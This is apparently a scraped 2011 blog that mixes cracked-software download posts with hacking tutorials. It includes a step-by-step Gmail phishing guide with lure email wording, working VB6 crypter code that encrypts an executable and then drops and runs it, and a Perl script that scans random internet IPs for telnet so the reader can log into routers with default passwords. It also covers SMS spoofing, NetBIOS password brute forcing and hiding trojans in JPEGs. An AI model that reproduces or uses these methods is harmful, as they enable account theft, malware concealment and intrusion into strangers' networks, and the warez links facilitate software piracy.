Friday, 29 April 2011

Windows 7 Manager 2.0.2 (x86/x64)



Why Should I use Windows 7 Manager?

Windows 7 is the newest Operating System for home users and professionals alike. Windows 7 brings clarity to your world, so you can more safely and easily accomplish everyday tasks and instantly find what you want on your PC.

Windows 7 Manager is the powerful software tool to tweak and optimize your Windows 7, it bundles more than 30 different utilities in one and help your system faster and more stable, secure and personal!

Features and Benefits of Windows 7 Manager

Information

Get detailed system and all hardware information on your system; help you find out the installation key of Windows, Office products; show all detailed information of running processes and threads on your machine; Windows 7 Manager offers 1-clicking cleans your system automatically.

Optimizer
Tweak your system to improve windows startup and shutdown speed; tweak your hardware to increase system speed and performance; Optimize Task Schedule to turn off unnecessary system tasks.

Cleaner
Find out which files or folders engross your disk space and shown with chart; Find and clean junk files to increase Hard Disk space; Duplicate Files Finder can scan your computer for files with the same size, name and modification time; Registry Cleaner can easily checks your registry and repair incorrectly linked registry entries, automatically remove invalid entries; Registry Defrag rebuilds and re-indexs your registry to reduce application response time and registry access time.

Customization
Control what is started on Windows startup; tune up Windows 7 boot menu; edit context menus of mouse Right-Clicking; customize system desktop, menus, toolbar and notifications settings; automatically change your desktop wallpaper on background.

Security
You can improve desktop, menus, Windows logon securities, and enable numerous hidden performance options of system, disable system updates and error reports; hide and restrict to access drives, specify which applications are not allowed to be executed on your computer; encrypt/decrypt and shred files, change the location of system folders; Privacy Protector can maintain your personal privacy by eliminating the tracks that you leave behind; create lots of randomization password once.

Network
Optimize your Internet connection speed, manage all shares items; tweak your Internet Explorer easily.

Misc. Utilities
Show the collection of Windows utilities; split and merge any file.
Windows 7 Manager 2.0.2 (x86/x64).Incl.Serial
Download : | FileSonic | DepositFiles | Turbobit |

Install phpVirtualBox on Windows & Linux

What is phpVirtualBox: How to Install phpVirtualBox on Windows & Linux

This article introduces phpVirtualBox, an open source, AJAX and PHP-based implementation of the Oracle VirtualBox interface.

oracle VirtualBox is a great enterprise ready virtualisation software. However, what it lacks is a powerful Web-based management interface. Usually, people prefer VMWare over VirtualBox, as it has good Web-based remote management interface.

phpVirtualBox provides an interface that"s a VirtualBox-look-alike for people who are not command-line savvy. Through phpVirtualBox, you can control a headless VirtualBox VM from a Web browser, including operations such as start/stop VMs, take snapshots, configure VMs, import/export VMs, and much more.

The requirements are:
  • Any Web server with PHP 5.2.0 or later; xampp will be good.
  • A working installation of Oracle VirtualBox 3.2.2 or later.
  • Any Web browser--- Firefox, Opera, Chrome or IE---will do the job.
Installation on Windows

Installation is very simple. Here , I"m using Windows XP SP3.

Install Oracle VirtualBox OSE 3.2.10, and then install xampplite-win32-1.7.3. Download phpVirtualBox 0.5 from here and extract the files/folder into htdocs directory. phpVirtualBox requires that vboxwebsrv.exe
must be running on the Oracle VirtualBox host machine. This file is located at C:\Program Files\Oracle\VirtualBox\.
Now, edit the config.php file and change it to the following settings:
Now navigate to the resulting folder in your Web browser. ( see the figure below)

Installation on Linux


The installation on Linux is also very simple. I am using Ubuntu 9.10 for this work, and installed xampp-linux-1.7.3. It comes with the latest PHP version. To install Oracle VirtualBox 3.2 on Ubuntu, first you have to add the repos for VirtualBox in your /etc/apt/sources.list:
After that, update your repository cache with the following command :
To install Oracle VirtualBox, run the code given below:
phpVirtualBox requires you to start the vboxwebsrv program, located under /usr/bin:
Here are the parameters :
  • -b : run the program in the background
  • -logfile : log file location for vboxwebserv
Now download phpVirtualBox 0.5:

Unpack it to /var/www or /usr/local/apache2/htdocs. In config.php, edit the following parameters:

Now navigate to the resulting folder in your Web browser.

NOTE: for the sake of tutorial, i have used a single physical machine for Oracle VirtualBox and phpVirtualBox. If you don,t want burden at your Oracle VirtualBox installation with a Web server, then you can host phpVirtualBox on another machine. In that case, you have to make some simple modifications.
Till then enjoy the post and keep visiting !!!

Foxit Phantom PDF Suite 2.2.1 Build 1103




Foxit Phantom is a business ready PDF toolkit, with everything you need to create professional PDF documents and streamline business processes: fast, easy to use, and at a price that fits your budget. Foxit Phantom provides an all in one solution for business users of PDF, and a sensible alternative to Adobe Acrobat. With Foxit Phantom you can create standards compliant PDF files from hundreds of files types up to 3 times faster than with competitor tools. The lightweight application with a tiny footprint means you can download and install Foxit Phantom in a flash and reliably view any PDF document that comes your way. Unlike other PDF tools, Foxit Phantom lets you edit content directly. Or you can use the convenient annotation tools to add comments, highlights, stamps, and more. Delete pages, add pages, and assemble new PDF documents. Plus, Foxit Phantom’s robust security features keep your business documents safe. Password protect documents, add certificate encryption, and sign with digital certificates.


FEATURES:


Small and fast
* Up to 3 times faster PDF Creation than competitor tools
* Installation file is around 10 MB and takes 22 MB of hard drive space, about 1% of competitor’s product size
* And launch speed is much faster


Create industry-standard compliant PDF files from any printable file
* Support 100's of the most common file types
* One click produces PDF from Microsoft Word documents automatically


Scan paper document to PDF directly
* Streamline workflow by converting paper contracts, agreements, etc to electronic PDF files


Edit and modify PDF contents
* Quickly edit document content and correct mistakes right in a PDF
* Add text to your PDF document as you need


Compare PDF documents
* Highlight the differences between two PDF documents to help you identify what has been changed quickly and easily


Organize PDF pages
* Re-order PDF pages without help from any other applications to simplify your operations
* Add, delete, or combine pages from multiple PDF files to create new PDF documents


Design and fill-out electronic forms
* Convert your current forms into electronic PDF forms
* Easy to use forms design tools make your PDF documents more interactive
* Collect the data your company needs from customers, partners and employees easily without the cost of re-keying
* Reduce paper handling
* Extend document-based processes to better engage with customers, partners, constituents, colleagues, etc


Protect PDF documents with passwords and certificates
* Control access to PDF documents
* Protect sensitive PDF documents to prevent loss of valuable company assets
* Enhance security when sending and receiving PDF files


Control PDF document usage such as printing, changing, content extraction
* Manage PDF usage permissions for individual documents within or without your organization


Add digital signatures to PDF documents
* Streamline business processes typically requiring paper-based or in-person collaboration by signing your PDF documents digitally
* Enhance security by instituting identity authentication
* Automatically check for documents integrity unauthorized content changes


Changes Foxit Phantom PDF Suite Version 2.2.1:
* Fixed the crash issue when opening some PDF files.
* Fixed the crash issue during continuous scanning.
Foxit Phantom Pdf Suite 2.2.1 Build 1103.Incl.Key-YAG and key-peterzuma
Download : | FileSonic | DepositFiles | Turbobit |

Youtubeget V 5.8.6 Final




YoutubeGet is an all-in-one software designed to make quick and easy work to download Youtube videos and convert them. Offering a multitude of methods to acquire the video, this application has all the power you need while still remaining small and easy to use. After downloading videos it will auto convert FLV files to MP4, 3GP, AVI, WMV, MOV etc. Soon, you can see youtube videos on your MP4 or Cell phone.

YoutubeGet Benefits & Features:
• Download Youtube Videos to Cell Phone
• YoutubeGet will auto convert Youtube Videos to 3GP Cell Phone Format, then you can see all youtube videos on your Cell Phone!
• Download Youtube Videos to iPod
• You can download youtube videos and save them as iPod MOV or MP4 format, and play them anywhere!
• Download Youtube Videos to PSP
• After playing games on your PSP, would you like to see some cool videos? YoutubeGet will download youtube videos and save them as PSP format!
• Download Youtube Videos and Burn to a CD/DVD
• Download youtube videos and save as AVI or WMV. It is much easier to burn these funny videos to a CD/DVD by this two formats.
• Clipboard Monitor Helps You to Download Youtube Videos Much Easier
• YoutubeGet monitors your Clipboard all the time. when you are copying a Youtube Video URL, immediately the Add New Download window will auto pop up.
• FLV Converter (Free in YoutubeGet V4 Suite)
• You can convert your local FLV files to AVI, WMV, MOV, 3GP, MP4 etc by YoutubeGet FLV Converter for FREE! You Save $29.95 !
• Youtube Browser
• Search Youtube Videos and Preview them before downloading.

YouTubeGet v 5.8.6.Incl.Keygen-Mazuki
Download : | FileSonic | DepositFiles | Turbobit |

Thursday, 28 April 2011

Real Hide IP 4.0.7.2 Final


Did you know your IP address is exposed every time you visit a website? Your IP address is your online identity and could be used by hackers to break into your computer, steal personal information, or commit other crimes against you. Real Hide IP allows you to surf anonymously, change your IP address, prevent identity theft, and guard against hacker intrusions, all with the click of a button.

Key Features
Easily Conceal Your IP Address
Anonymous Web Surfing
Advanced Application Support
Protect Your Identity and Stop Hackers
Un-ban Yourself From Forums, Blogs, Etc...
Prevent websites from tracking your online activities
Quickly delete all Internet Explorer and FireFox cookies
Automatically clear your cookies each time your IP changes.

Real Hide IP 4.0.7.2 Final.incl.Patch-UST
Download : | FileSonic | DepositFiles | Turbobit |

Send Sms From Friends MobileTo Any Number

Hello Friends, today i am sharing an awesome trick with you all. Today i will tell you how to send anonymous SMS i.e. How to send SMS from any mobile number to any mobile number that means how to send SMS from your friend's mobile to your mobile or your friends mobile to your friends mobile or any other number. Basically this technique is call SMS spoofing. By SMS spoofing we can send SMS to any mobile using anyone's mobile number. How this trick can be helpful?? its simple it is helpful when you wanna prank your friends, enemies or simply you want to send free SMS to your friends using their numbers only. So friends read on...



What is SMS Spoofing?
Spoofing is basically mimic of the original i.e. SMS spoofing basically is a technique to send anonymous SMS to any mobile number. By anonymous i means that we can use any mobile number to send the SMS. 

This is not actually a trick or hack but it's a service that a company is providing but the only thing the company forgot is internal send ID Check i.e. which number we are using to send SMS. So this service allows us to send SMS from any number to any number that means. Now the number that we register will be shown to the victim.
Hence we are exploiting the Internal sender ID phone verification feature.

Feature's of SMS spoofing:
  • Spoofed sms (any mobile number to any mobile number)
  • 100% anonymous  messages
  • Worldwide Network (i.e. we can send SMS all over the world)
  • No advertisements
  • Instant Delivery of SMS


How to use this Hack? 
1. First of all, register here . This website looks like this . Fill as i shown below:

 
 

2. After Registering you will get 25 free credits that means you can send 25 free SMS from any number to any number. For using it again register another mobile and email ID. 25 SMS is the limitation of this trick from one registered number.. Usually people have two to three sims.
3.  Now after registering you will receive password on registered mobile number.
4. Now login with that password that you got on mobile.
5. Now go to Send SMS to number . As shown in snapshot below:


6. After entering the details as explained in snapshot above. Click on send.
7. That's all the hack. I know its limited but its awesome...Isn't It..

I hope you all have enjoyed it.. Keep visiting friends for more such hacks...

Hack Gmail Accounts

Hello Friends, Let's start this tutorial with some quotes " If you follow the Universe, the Universe will spoil you,So always make your own ways, let's other follow it and spoil themselves."

Today i will explain you How to hack Gmail account step by step. I will disclose you how the hackers really hack the gmail account or gmail password using fake pages or simply called Phish pages and the technique involved is called Phising.

NOTE: THIS IS FOR EDUCATIONAL PURPOSES ONLY. DON'T MISUSE IT.


hacking gmail account or passwords 

Things that we will need:
1. Phish pages for Gmail Website.
2. A Free web hosting server to upload these fake pages.

3. An Email account for sending mails. ( create one fake email account for this as your account can be banned for doing such things).

4. HTML format mail that has to be sent to user ( you can post your email ID's below if you need the original version of this HTML mail. And please don't put your credentials in reply of this message).

Note: By using this hack i have hacked more than 5000+ accounts of gmail, yahoo, facebook, hotmail etc...As Hacking is my passion and i love to do it for fun. But friends i never misused this and hope that you will also not do that. As this tutorial is for Educational purposes and i and isoftdl.com is not responsible if you have misused it.



Now friends first all you should know what is phishing and how it is done..


What is Phishing?
Phishing is a technique to hack passwords of any user by using phish pages. Now what are phish pages, in general, phish pages are the fake pages that look likes the same web page the only difference lies in the METHOD and ACTION codes. In original webpage you are directed to database to that website but in fake pages you are directed to program that writes the log file that consist of username and password of the user. In fake page method function directs you to a php program that writes the log and simultaneously it redirects to original website and copy the username in the username column of original website and it shows that you have entered a wrong password and when you enter the password again then you are entered into the original website. So the user will never know that his account has been hacked, he will only think that he has entered wrong password. So isn't its a good trick.




STEP BY STEP GUIDE TO HACK GMAIL ACCOUNT

1. Download the phish pages ( fake pages for Gmail).
Click here to download

2. Now Extract the folder . After extracting you will get two folders namely:

  a. Gmail.com ( For all countries)   b. Gmail.de    (For Germany users)


3. Now open the Gmail.com folder. In this folder you will see three files namely:

  a. gmail.html   b. mail.php   c. log.txt
Gmail.html is the phish page that looks like original Gmail page, when user enters his credentials i.e. username and password, then it will be redirected to write.php file which will write username and password to log file and simultaneously redirect the user to original website, that will show you have entered wrong password.



4. Now Create a fake Gmail account for sending mails and creating account on free web hosting server.

How to create Gmail account without Phone verification?

Its pity simple to create Gmail account without Phone verification. At the time when you create new account, when you choose email ID (i.e. username ), choose it as much as unique or absurd that you can. Now create the account , gmail will not ask you for phone verification.



5. Now when you have created the fake account for testing this hack, you have to configure this email account setting. Login to fake Gmail account and click on settings. Then go to Accounts and Import and then in front of Send Email as  you will see edit info as shown in below snapshot.



hack gmail

 6. Now You have to create account on free Web Hosting website. The website that i will use to explain is         www.t35.com. When you open the website there you will see a button "START UR WEBSITE" click on that. Now you will see new page there enter the credentials and create account. Then go to your fake email address and validate the account.


7. Now login into your account in t35.com and Now click on New Directory as shown below:



hack gmail id


Then do as shown in this snapshot:



hack gmail account password


After confirming go back to main directory as shown:



How to hack gmail account




Now double click on Gmail folder on t35.com that we have created in previous step. Now you will be inside the Gmail Directory. Then click on Upload button as shown is figure:



hack gmail password


Now after confirming the files upload go back to main Gmail directory. Now there you will see three files and click on the open  in front of gmail.html file as shown below:



working gmail id hack


Now you will see the something awesome below:



how gmail hack works


8. Now we have created the fake page but its detectable. Let's make it more undetectable. For that go to the following website and copy the link in the URL box and Click on Next. As shown below:



gmail hacking software


Now after that enter domain name her like gmailvalidation.tk or gmail verify.tk or anything similar to that as shown...



gmail passowrd hacking 


Now click Below to confirm as shown:

how gmail hack works

Now open the sample website you will see :(Click here)

9. Now Creation Part is over, now we have our link that we will send to the user. Now How we will send it to user. Open your fake email account that you have created in step 5 and step 6. Click on Compose mail and In Subject Enter "Notice: Please Verify your Gmail Account" ( without quotes).
And in body write something like that we have seen illegal activity from your account. please verify your account within three days other we have to lock your email account. For verifying visit here www.gmail.com and hyperlink link your fake mail address and send it to user.
 If you want to get the Original Mail, post your Email ID below in comment. I will mail you the original mail directly to your email. We can't disclose it directly on website.

10. Now just wait one day or few hours till user enters his credentials.(depends how fast the user reacts to the email). Once the user logs in to his Gmail account using your Phisher, his user ID and password are ours..And these are stored in log.txt What you have to do is just refresh your Web hosting account files. 

how to hack gmail accounts

11. The Log.txt file will contain the passwords and look like this:

gmail passowrd hacking
 

Thats all Now you have hacked the password of victim. I hope you all have Liked It.

How to Protect Your Gmail Account From Phisher??
1. Always check the URL in the address bar before entering username and password.
2. Never follow any link from your email and any website until u have confirmed the Address bar URL.
3. Never Follow spam mails and "Win lottery or Cash" mails.

If you have Any Queries Ask me in form Of Comments ...  Enjoy and have Happy hacking.

KEYBOARD SHORTCUTS FOR INTERNET

KEYBOARD SHORTCUTS FOR INTERNET

CTRL+click (Open links in a new tab in the background)
CTRL+SHIFT+click (Open links in a new tab in the foreground)
CTRL+T (Open a new tab in the foreground)
ALT+ENTER (Open a new tab from the Address bar)
CTRL+Q (Open Quick Tabs - thumbnail view)
CTRL+TAB/CTRL+SHIFT+TAB (Switch between tabs)
CTRL+n (n can be 1-8) (Switch to a specific tab number)
CTRL+9 (Switch to the last tab)
CTRL+W (Close current tab)
ALT+F4 (Close all tabs)
CTRL+ALT+F4 (Close other tabs)

Speed Up Windows

Safely turn Off Windows Services To speed up Windows

Some of the windows services starts with the windows eating up the memory. and if they are not used by you then you can stop them from starting with windows. You can re-enable them when you need it.


To check the services program...goto

start -> run ->type" services.msc " (without quotes) -> and hit enter.

There will be a list of services...Some common services you can check and stop them according to your need..

To stop a service..double click the desired service and click on stop button. To stop that service from startup..select "disabled" instead of Automatic from the startup type option

1) Error Reporting Service - stop the alert of send and dont send error

2) Help and Support - You can safely turn this feature off..as no one uses this

3) Indexing Service - keep it on of you use windows search..because..this makes the search faster

4) Messenger - Windows messenger. turn it OFF..if you don't use it.

5) Telnet - Turn this OFF..if you don't use it.

6) Interruptible Power Supply - Turn this OFF...if you don't have an UPS


.............................................................................................................................

How To Make a crypter

How To Make a crypter ?
What you will need:
Visual Basic 6 or Visual Basic 6 Portable
A RC4 module
A brain


The RC4 module and Visual Basic 6 Portable will have the download links at the end of this tutorial.

TABLE OF CONTENTS:
1. Introduction
2. Building your crypter
3. Conclusion

1. Introduction

RC4:
In cryptography, RC4 (also known as ARCFOUR or ARC4 meaning Alleged RC4, see below) is the most widely used stream cipher and is used in protocols such as Secure Sockets Layer (SSL) (to protect Internet traffic) and WEP (to secure wireless networks).

Stub:
A method stub or simply stub in software development is a piece of code used to stand in for some other programming functionality. A stub may simulate the behavior of existing code (such as a procedure on a remote machine) or be a temporary substitute for yet-to-be-developed code. Stubs are therefore most useful in porting, distributed computing as well as general software development and testing.

Builder:
A builder is usually the client to make/do something to a file, and it is supposed to go with a stub. The builder usually allows the stub to simulate the behaivor of existing code, and than it makes the file/does something to a file.

2. Building your crypter.

Now, open up Visual Basic 6 or Visual Basic Portable. To make the task easier, open two Visual Basic 6 programs. One is going to be the builder, and one is going to be the stub.

Now, lets start on the builder. Add a RC4 module, and lets go on. First of all, add one label that says "File Path:", a text box right beside "File Path:", a button that says "Browse" or "...", and another button that says "Crypt" or "Build". Now, lets add the CommonDialog control. Add a CommonDialog and name it commondlg. Now, lets double click the button that says "Browse" or "...". Add this code, and I'll explain it.



Code:
With commondlg 'CommonDialog1.
     .Filter = "Executable files | *.exe" 'The file used for crypting. (*.exe)
     .DialogTitle = "Please select a executable file..." 'The title of the dialog.
     .ShowOpen 'Show the dialog.
     End With
     TextBox1.Text = commondlg.FileName 'Make TextBox1.Text as the selected filename.

The With commondlg command calls CommonDialog1.
The .Filter part allows you to choose what files you only want to be selected.
The .DialogTitle command is the title of the dialog (the prompt that tells you which file you want to select for crypting).
The .ShowOpen command shows the dialog.
End With will end CommonDialog1.
And finally, the TextBox1.Text = commondlg.FileName command makes TextBox1.text show the selected filename.

Now, click the button that says "Build" or "Crypt". Add this code. It explains it, so please take time to read what it says.
Code:
Dim sStub As String, sFile As String 'This command will declare the two strings.
Open App.Path & "\stub.exe" For Binary As #1 'Opens up the stub.
sStub = Space(LOF(1)) 'This declares the space.
Get #1, , sStub 'This puts in a space in the file.
Close #1 'This closes the file.

Open TextBox1.Text For Binary As #1 'Opens up the stub.
sFile = Space(LOF(1)) 'This declares the space.
Get #1, , sFile 'This puts a space in the file.
Close #1 'This closes the file.

Open App.Path & "\output.exe" For Binary As #1 'This creates the crypted file as "output.exe".
Put #1, , sStub & FileSplit & RC4(sFile, Pass) 'This adds the option FileSplit and the RC4 option.
Close #1 'This closes the file.

MsgBox ("File crypted successfully!") 'This is the prompt to show the message that the program successfully crypted the file.

Now, you might have an error that will show you that FileSplit and Pass is not declared. To do so, we will add the declarations on the top of the coding.

Code:
Const FileSplit = "<@#@>" 'The file split.
Const Pass = "s0rasRC4Tutorial" 'The RC4 password.

For this tutorial, we will be using "s0rasRC4Tutorial" as the RC4 password.

Now, lets start on the stub. Add the RC4 module, and make a new module called modMain. Add this code in modMain:
Code:
Const FileSplit = "<@#@>" 'The file split.
Const Pass = "s0rasRC4Tutorial" 'The RC4 password; It must be the same as the one on the builder!

Public Declare Function ShellExecute Lib "Shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpszOp As String, ByVal lpszFile As String, ByVal lpszParams As String, ByVal LpszDir As String, ByVal FsShowCmd As Long) As Long 'Calls the ShellExecute command.

Public Sub Main() 'The main part of the stub.
Dim sStub As String, sFile As String 'This will declare the strings again, just like we did on the builder.
Open App.Path & "\" & App.EXEName & ".exe" For Binary As #1 'Opens up the selected .exe file.
sStub = Space(LOF(1)) 'This will declare the space.
Get #1, , sStub 'This puts a space in the file.
Close #1 'This closes the file.

sFile = Split(sStub, FileSplit)(1) 'This will split the file and the stub.
Open Environ("tmp") & "\decrypted.exe" For Binary As #1 'This will make a decrypted file in the RC4 folder.
Put #1, , RC4(sFile, Pass) 'This will add the RC4 password to the file with the selected RC4 password.

Call ShellExecute(0, vbNullString, Environ("tmp") & "\decrypted.exe", vbNullString, vbNullString, 1) 'Calls the ShellExecute command and drops the decrypted file in the temporary files folder.

End Sub 'This ends "Public Sub Main()".

The code will be teaching you. Once you're done, remove the Form1.

3. Conclusion
I hope you liked this tutorial, and I hope you learned a lot about crypting with RC4!

Visual Basic 6 Portable: http://www.mediafire.com/?tgicg4hn1n5
RC4 module: http://www.freevbcode.com/ShowCode.asp?ID=4398
................................................................................................................................................................................................................
................................................................................................................................................................................................................

Manually Hide any file in JPEG

Hello Friends, today i will explain you how to hide any file behind the JPEG image manually that is without any software. Its a very easy trick and also very useful if you want to send information secretly to your friend. Also its different from stenography as it does hides text behind images or text behind mp3 files. Its universal, you can hide any file, virus or Trojan or anything behind image using this trick


Things that you will need for this trick:
1. Winrar installed on your system.
2. Little knowledge of command prompt.


hide files, hide files in images,how to file virus,hiding trojans


Steps to Hide any File behind JPEG image Manually
 
1. Create an folder into C drive (recommendation is that use this C:\Hidden).

2. Now gather all files that you want to hide in this folder.

3. Now add these all files to compressed .rar file using winrar 
(example myhiddenfiles.rar ).
Note: This rar file should be in the same directory (i.e. C:\Hidden)

4. Now Select the JPEG file that you want to use to hide the above content 
(say myimage.jpg). Put this image file also in the same folder that is in C:\Hidden

5. Now, open Command Prompt (Go to Run and type ‘cmd‘). Make your working directory C:\hidden.
  (When you open CMD you will get like C:\Documents and settings\username (something like this)
 Now type cd.. and press enter and then again type cd.. and press enter. Now you have something like this in cmd  C:\   . Now in front of that type cd "Hidden"  and press enter. )

6. Now type: “COPY /b myimage.jpg + myhiddenfiles.rar outputimage.jpg” (without quotes) - Now, myimage.jpg is the picture you want to show, myhiddenfiles.rar is the file to be hidden, and outputimage.jpg is the file which contains both....

7. Now, after you have done this, you will see a file output.jpg in C:\hidden. Open it (double-click) and it will show the picture you wanted to show. Now try opening the same file with WinRAR, it will show the hidden archive...

This hack will help us to hide things behind the JPG file without any software. i hope you all have liked it. For more such hacks keep visiting.

Hack Rapidshare | hack Hotfile | bypass time limit

Most of the file hosting services such as Rapidshare, Mediafire, Uploading, Hotfile and many more give very less features to free users and force them to wait for a limited amount of time with many limitations. In this blog you will find many links belonging to those file servers. There are many softwares and tricks are available to hack those servers premium features. I am going to write about a firefox addon. Which helps you in great way. This is Skipscreen.


Download Skipscreen to your firefox browser:
http://dl.skipscreen.com/files/SkipScreen-Setup.exe 


everytime when you visit any of these file hosting website you will see like this.


and within some seconds downloading will start..

SkipScreen works great on these sites:


  • Rapidshare (don't click! it's automatic!)
  • Megaupload (captcha action coming soon!)
  • Mediafire
  • Uploaded.to
  • zShare (now with a "listen-first" option!)
  • Sharebee
  • DepositFiles
  • Sendspace
  • Divshare
  • Linkbucks
  • Link-protector
Many More

Hack Router For Exploration

REMOTE ROUTER HACKING
Introduction
Ok, Basically this tutorial deals with how to scan large amounts of addresses for telnet services, which we can then attempt to use default credentials to log in with surprising success.

Why Telnet? Isn't That Dead Now?
Your partly correct, telnet is dead now, it was superseded by SSH because telnet sends packets in plain text where as SSH encrypts packets. But telnet is still very much used on routers for simple administration by low tech management systems that come packaged with alot of off the shelf routers. Some of these routers allow remote clients to connect to telnet as well as local users - these are the boxes that we are looking for.

So what do i need ?
You'll need to run this perl script, (written by me, found below), this simply generates a random IP address, if the IP is in a scannable class (ie not a private, experimental or loop back address) the programme attempts to open a connection to the telnet port (23) of the random ip, if it succeeds the program logs the success in a local file for later analysis. The program then repeats -- so if you run a few instances of the program for a few hours you can end up with a list of around 200 telnet servers - ive left mine overnight before and collected 880 servers before.



Code:
#!/usr/bin/perl
use IO::Socket;
########################### IP GENERATOR ########################
sub ipgen(){
my $range1 = 223;                        #avoid experimental and multicast
my $range2 = 254;             
$oct1 = int(rand($range1)) + 1;                    #generate random octects
$oct2 = int(rand($range2)) + 1;
$oct3 = int(rand($range2)) + 1;
$oct4 = int(rand($range2)) + 1;

if($oct1 == 127 || $oct1 == 172 || $oct1 == 192 || $oct1 == 10){#if gets rid of loopbacks and private ips
$ip = &ipgen();                            #if local or private call again
}else{
$ip = "$oct1.$oct2.$oct3.$oct4";                # otherwise allocate the ip to return
}
return $ip;                            #return to caller     
}
#################################################################
############################## MAIN #############################
print "########################################\n";
print "#---------Random Telnet Scanner--------#\n";
print "#-----------Written by 50LaR15---------#\n";
print "########################################\n";
while(1==1){                            # keeps code running indefinatly
$target = &ipgen();                        # get random ip to scan
print "*??* SCANNING: $target \n";                    # output
my $sock = new IO::Socket::INET (                # try to create socket to chose random address
                 PeerAddr => $target,
                 PeerPort => '23',        # change this number to change ports you want to detect
                 Proto => 'tcp',
                 Timeout => '3',         # you can get away with a timeout of 1 second but i have 2 to be safe
                 );
if($sock){                            # if socket opened (port open)
print "*!!* SUCCESS-: $target \n";                # print to screen
open(DAT, ">>telnet.txt") || die("Cannot Open Output File");     # open results file
print DAT "SUCCESS: $target \n";                # append findings to end of file
close(DAT);                            # close the file
}
close($sock);                            # close the socket
}################################################################

Youll also need need a telnet client - I recommend you use putty because it supports proxys, but you are dealing with people who dont know how to change there router passwords so you shouldnt be too worried so you can use the defauly OS telnet client - for windows XP/linux users you will already have one - for windows 7 users you will need to enable yours with this tutorial .

Ok - I'm Set Up - So Now What?
Youll need to start a few instances of the perl script, you can make your desktop look pretty like mine below if you wish.

[Image: 4185786.png]

You can just run one but it will take longer to get a decent sized list of servers. I run 5 for around half an hour and that gives me a list of around 50 telnet boxes.

Ok now you have your list of IP's with the telnet port open (called telnet.txt in the same directory as your perl script), what you need to do is take your telnet client and just start connecting to them, - you will be prompted for a username + password.

This is where it gets fun - because alarge amount of routers ship with default accounts - here are the most common.

Username:Password
_________________
admin : admin
admin : (blank password)
root : (blank)
root : root

To be honest alot of routers disclose there model number in the telnet banner when you connect so a simple google search often turns up the default username and password. Otherwise i try the top 3 and usually get disconnected and move on to the next in my list.

You will find out quiet fast how many ip's in your list you can actually log into with full admin rights

[Image: 4185900.png]
Who Exactly Am I Hacking?
This is half the fun for me - you dont really know - if your interested you can just do a quick whois -but around 90% of the time your dealing with home routers that people have bought from a shop and not configured properly but i have found business and offices that have succumb to the same laziness as the home user so the possibilities are endless.

Ok now what ?
From here its up to you what you do, but i enjoy using simple network tools like ipconfig and ping to map out the network, sometimes i have found routers that have nmap and telnet clients on etc. Today i found one that let me download any C code onto it i wanted - almost every router OS is different so some take a while to get used to what commands you can run but it is alot of fun finding out peoples network layout, i have compromised routers, made my way into the internal file servers of the network using brute forcers, or setting up port forwarding on the router to give me access externally to otherwise private internal resources - you can even port forward packets to printers and use them across the internet to print out hundreds of copys of the dictionary or what ever literature tickles your pickle.

A funny concept that i have got to work in the past is fucking with the routing tables and redirecting every web request to gay porn sites. So I would imagine that this could be useful for people trying to get RAT's spread, especially if you find a router with upwards of 100 PC's behind the router - but i dont deal much with rat's and botnets so dont quote me on that.

A Small Aside.

Ill be happy if a few people read this tutorial and explore a few networks because thats what used to drive hacking forwards, and its what used to motivate hackers, the thrill of exploring the unknown, the chance of coming across a really large network to explore and further your knowledge and skills of systems. I think people focus too much on making money from hacking, or getting there best friends fu**book password and the real fun somehow has been lost in the past 10 years to a new generation of kids that just want everything now. Lets keep some of the old skills and knowledge alive and not let it be lost in the archives of long since abandoned forums and irc rooms.

Enable Telnet in windows 7

It’s very rare that I use Telnet these days, so it took a long time for me to notice that by default it was not packaged with Windows 7. I did some research and found out that this was also true for Windows Vista. More than likely this was an attempt to make Windows more secure by default, as Telnet is very insecure and whenever you have the choice you should always use SSH. However, with that being said, you can quickly re-enable Telnet by following these steps:

  1. Start
  2. Control Panel
  3. Programs And Features
  4. Turn Windows features on or off
  5. Check Telnet Client
  6. Hit OK
After that you can start Telnet via Command Prompt. Credits FettesPS

Hack Computers Inside LAN Network

Today,I will write about hacking computer inside the LAN network.

This technique will be taking advantage of Port 139.

Most of the time,Port 139 will be opened.

First of all,I will do a port scanning at the target computer which is 192.168.40.128.

This computer is inside my LAN network.

I will scan it using Nmap.

[Image: 1_13.jpg]

I get the result and it shows Port 139 is opened up for me.

Now you will need both of these tools:
** USER2SID & SID2USER
** NetBios Auditing Tool

You can get both of them on the Internet.

After you get both of them,put them in the C:\ directory.

[Image: 2_1.jpg]

You now need to create a null session to the target computer.

[Image: 3_3.jpg]

Now open the Command Prompt and browse to the USER2SID & SID2USER folder.There will be 2 tools inside it,one will be USER2SID and another one will be SID2USER.

We will first using USER2SID to get the ID.

[Image: 4_10.jpg]

We will test against the Guest account because Guest account is a built in account.

After we get the ID,we need to do some modification on the ID.

We take the ID we get from the guest account and modified it become
"5 21 861567501 1383384898 839522115 500".

Please leave out the S-1-,leave out all the - too.

[Image: 5_8.jpg]

Now you will see that you get the username of the Administrator account.

In this case,the Administrator account is Administrator.

Create a text file called user.txt and the content will be the username of the Admin account.

[Image: 6.jpg]

Prepare yourself a good wordlist.

[Image: 7.jpg]

Now put both of them in the same directory with the NetBios Auditing Tool.

[Image: 8.jpg]

Now we are going to crack the Admin account for the password in order to access to the target computer.

Browse to the NetBios Auditing Tool directory.

[Image: 9_1.jpg]

Press on enter and the tool will run through the passlist.

[Image: 10.jpg]

In this case,I have get the password.

In order to proof that I can get access to the target computer using this password.

[Image: 11.jpg]

After you press enter,it will prompt you for the username and password.

[Image: 12_6.jpg]

Therefore,just input them inside the prompt and continue.

[Image: 13.jpg]

Target C drive will be on your screen.

[Image: 14.jpg]

In order to prevent from this attack,close down port that you do not want to use such as Port 135,Port 136,Port 137,Port 138 and Port 139.

The download link of the tools will be:
Download Tools.rar

Configuring VNC-SERVER And Squid Proxy Server in CentOS

Configuring VNC-SERVER And Squid Proxy Server in CentOS (32 & 64) based VPS
Installing GUI based Gnome-Desktop, squid, vnc, vnc-server, firefox in centos based VPS
NOTE :-

# stands for comment
$ denotes sshell commands

1st. Open SSH of your VPS with your Favorite SSH client.

2nd. In Shell Prompt >_ Write commands as described below.


Code:
$ yum update -y

Phase of Installing All Products...

Code:
$ yum groupinstall gnome-desktop -y
# This will install 4 apps at once !
# 1 squid is advance proxy server
# 2 vnc is vnc viewer client
# 3 vnc-server is VNC server to operate remove computer's GUI interface of gnome from your desk.
# 4 firefox will unlease speed of internet as it is installed in VPS !

Code:
$ yum install squid vnc vnc-server firefox -y


# Configuring VNC-SERVER in CentOS based VPS....

# Set Your VNC Password For login..
Code:
$ vncpasswd
